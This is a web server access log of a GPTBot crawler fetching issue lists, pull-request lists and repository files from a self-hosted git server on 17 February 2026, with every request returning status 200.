git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 21714] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" -[17/Feb/2026:18:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11615] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11617] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11611] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec?display=rendered" [Client 74.7.227.38] [Length 11141] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:18:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9921] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9918] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10099] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12021] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec?display=source" [Client 74.7.227.38] [Length 12575] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:18:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12504] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:18:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" -[17/Feb/2026:18:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 14178] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" -[17/Feb/2026:18:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec?display=rendered" [Client 74.7.227.38] [Length 11140] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:18:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14632] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/index.html" -[17/Feb/2026:18:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&state=closed&type=all" -[17/Feb/2026:18:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" -[17/Feb/2026:18:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 9072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:18:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11611] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:18:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.46] 